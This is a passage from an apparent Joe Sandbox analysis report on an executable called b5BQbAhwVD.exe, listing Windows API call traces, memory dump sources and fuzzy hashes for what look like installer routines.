                                                                                                                  • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                                    • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\b5BQbAhwVD.exe,80000000,00000003), ref: 00405EE2
                                                                                                                    • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                  • String ID: %ls=%ls$[Rename]
                                                                                                                  • API String ID: 2171350718-461813615
                                                                                                                  • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                                  • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                                  • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                                  • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                                  APIs
                                                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00403480,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                  • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                  • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00403480,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                  • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00403480,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                  • String ID: "C:\Users\user\Desktop\b5BQbAhwVD.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                  • API String ID: 589700163-3941435272
                                                                                                                  • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                  • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                                  • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                  • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                                  APIs
                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                                  • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                                  • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                                  • GetSysColor.USER32(?), ref: 0040444C
                                                                                                                  • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                                  • DeleteObject.GDI32(?), ref: 00404476
                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2320649405-0
                                                                                                                  • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                  • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                                  • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                  • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                                  APIs
                                                                                                                  • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                  • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                  • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                  • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2531174081-0
                                                                                                                  • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                                  • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                                  • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                                  • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                                  • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                                  • wsprintfW.USER32 ref: 00402EF5
                                                                                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                    • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                    • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                                    • Part of subcall function 00402E72: MulDiv.KERNEL32(0001E391,00000064,0001E212), ref: 00402E87
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                  • String ID: ... %d%%
                                                                                                                  • API String ID: 722711167-2449383134
                                                                                                                  • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                                  • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                                  • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                                  • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                                  • GetMessagePos.USER32 ref: 00404D3D
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                  • String ID: f
                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                  • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                  • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                                  • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                  • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                                  APIs
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,72ED21EC,?,00000808), ref: 72ED1635
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,72ED21EC,?,00000808), ref: 72ED163C
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,72ED21EC,?,00000808), ref: 72ED1650
                                                                                                                  • GetProcAddress.KERNEL32(!r,00000000), ref: 72ED1657
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 72ED1660
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2418368040.0000000072ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 72ED0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2418325538.0000000072ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2418407102.0000000072ED4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2418444245.0000000072ED6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_72ed0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                  • String ID: !r
                                                                                                                  • API String ID: 1148316912-476379476
                                                                                                                  • Opcode ID: 6c11ee362aa9f05b4bbfd8b9bfb0cb3ce8b1fd91291e773658c60d3911fe2ee2
                                                                                                                  • Instruction ID: f9b66e48466b40c4360e285f4e12943f57d09ebce24cc1f06d3f511996172887
                                                                                                                  • Opcode Fuzzy Hash: 6c11ee362aa9f05b4bbfd8b9bfb0cb3ce8b1fd91291e773658c60d3911fe2ee2
                                                                                                                  • Instruction Fuzzy Hash: 30F08C732061387BC62016A79C4CD9BBE9CDF8B2F5B610655F228E21D086214C01CBF2
                                                                                                                  APIs
                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                  • wsprintfW.USER32 ref: 00402E45
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                  • API String ID: 1451636040-1158693248
                                                                                                                  • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                                  • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                                  • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                                  • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 72ED121B: GlobalAlloc.KERNELBASE(00000040,?,72ED123B,?,72ED12DF,00000019,72ED11BE,-000000A0), ref: 72ED1225
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 72ED2657
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 72ED268C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2418368040.0000000072ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 72ED0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2418325538.0000000072ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2418407102.0000000072ED4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2418444245.0000000072ED6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_72ed0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$Free$Alloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1780285237-0
                                                                                                                  • Opcode ID: 01dde373c5061e9ca861c49dde279aa8101f33b9f8f0f9c5c5df1a0ac69065ed
                                                                                                                  • Instruction ID: fe0da2d898b6c836081a683fcd337f69c8f2311f5617d0b73c3fbea878936754
                                                                                                                  • Opcode Fuzzy Hash: 01dde373c5061e9ca861c49dde279aa8101f33b9f8f0f9c5c5df1a0ac69065ed
                                                                                                                  • Instruction Fuzzy Hash: DA31333A508201DFCB168F69E894E2E7BBAFB853043A0C96DF152C7161C7319C97DB62
                                                                                                                  APIs
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2667972263-0
                                                                                                                  • Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                                  • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                                  • Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                                  • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                                  APIs
                                                                                                                  • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                  • wsprintfW.USER32 ref: 00404CB6
                                                                                                                  • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                  • String ID: %u.%u%s%s$(7B
                                                                                                                  • API String ID: 3540041739-1320723960
                                                                                                                  • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                                  • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                                  • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                                  • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                                  APIs
                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nss456A.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nss456A.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWidelstrlen
                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nss456A.tmp$C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dll
